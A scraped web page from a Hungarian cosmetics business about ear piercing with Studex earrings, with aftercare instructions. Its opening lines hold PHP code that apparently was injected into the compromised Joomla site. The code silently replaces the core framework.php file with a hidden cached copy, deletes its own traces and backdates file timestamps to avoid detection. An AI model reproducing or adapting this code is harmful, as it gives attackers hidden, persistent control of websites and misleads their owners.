$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); }Skoda Bernadett - Kozmetika - Füllyukasztás

Füllyukasztás PDF Nyomtatás E-mail
studex_r

 

Az amerikai Studex cég fülékszereivel dolgozom, melyek 100 % -ig sterilek. Higiénikus, biztonságos, nikkelmentes fülbevalók, melyek megfelelnek az Európai előírásoknak. A fülbevalók 18 karátos aranyozott vagy orvosi fém (ezüstszínű) felülettel kezeltek. A füllyukasztás gyors, pontos és higiénikus. Babák füllyukasztását is vállalom.


studex3

studex_noi_arc

A fülbelövő készülék rugós szerkezete mintegy 1/10 másodperc alatt lyukasztja át a fülcimpát. A benne levő fülbevalót automatikusan és pontosan belövi a kívánt helyre, ezáltal minimalizálja a füllyukasztással járó kellemetlenségeket és fájdalmakat.

A FÜL  ÁPOLÁSA , utókezelése
  • Naponta fertőtlenítő szeszbe mártott fülpiszkálóval - a fülbevaló kiszedése nélkül - kell a fület megtisztítani, elöl és hátul. Ezután párszor a fülbevalót 180° -kal balra illetve jobbra forgatni a fülben.
  • A pillangókapcsot NE nyomkodja a fül felé a szár mentén; a kapocsnak mindig a fülbevaló szárának végén kell lennie. Minden tisztítás alkalmával ellenőrizze a kapocs mögötti részt.
  • 4-6 hétig hagyja benne a fülbevalót a fülében anélkül, hogy kiszedné. Ilyenkor a fül hamar beforr.
  • A füllyukasztás utáni gyógyulási időszakban (3-5 nap) a haj-spray -t, szappant, sampont és egyéb készítményeket tartsa távol füleitől. Amennyiben ezek valamelyike mégis éri fülét, öblítse le bő vízzel.
  • Enyhébb fájdalmak valamint bőrpirosodás előfordulhat - ez teljesen természetes. Megfelelő kezelés mellett ez 48 órán belül helyrehozható. Amennyiben bármikor túlzott fájdalom, duzzadás vagy bőrvörösség lépne fel, azonnal keressen fel hozzáértő egészségügyi szakembert - még mielőtt fülbevalóját kiszedné.
  • A fülbevalót csak 4-6 hét után szabad másikra cserélni, lehetőleg aranyra.
Joomla Templates and Joomla Extensions by JoomlaVision.Com
 
IWIWFacebookGoogle bookmark